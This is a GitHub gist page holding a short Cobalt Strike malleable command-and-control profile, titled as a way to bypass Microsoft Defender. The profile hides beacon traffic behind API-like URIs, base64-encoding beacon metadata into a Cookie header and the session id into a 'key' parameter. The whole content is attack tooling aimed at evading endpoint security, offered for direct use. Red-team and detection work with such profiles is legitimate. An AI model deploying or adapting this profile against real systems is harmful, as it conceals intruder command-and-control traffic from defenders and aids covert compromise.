Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save deltaclock/fe44319460b0a8e784e09cd65c433ddc to your computer and use it in GitHub Desktop.

Select an option

Save deltaclock/fe44319460b0a8e784e09cd65c433ddc to your computer and use it in GitHub Desktop.
Minimal Cobalt Strike C2 Profile for Bypassing Defender
http-get {
set uri "/apiv8/getStatus";
client {
metadata {
base64;
header "Cookie";
}
}
server {
output {
print;
}
}
}
http-post {
set uri "/apiv8/updateConfig";
client {
id {
base64url;
parameter "key";
}
output {
print;
}
}
server {
output {
print;
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment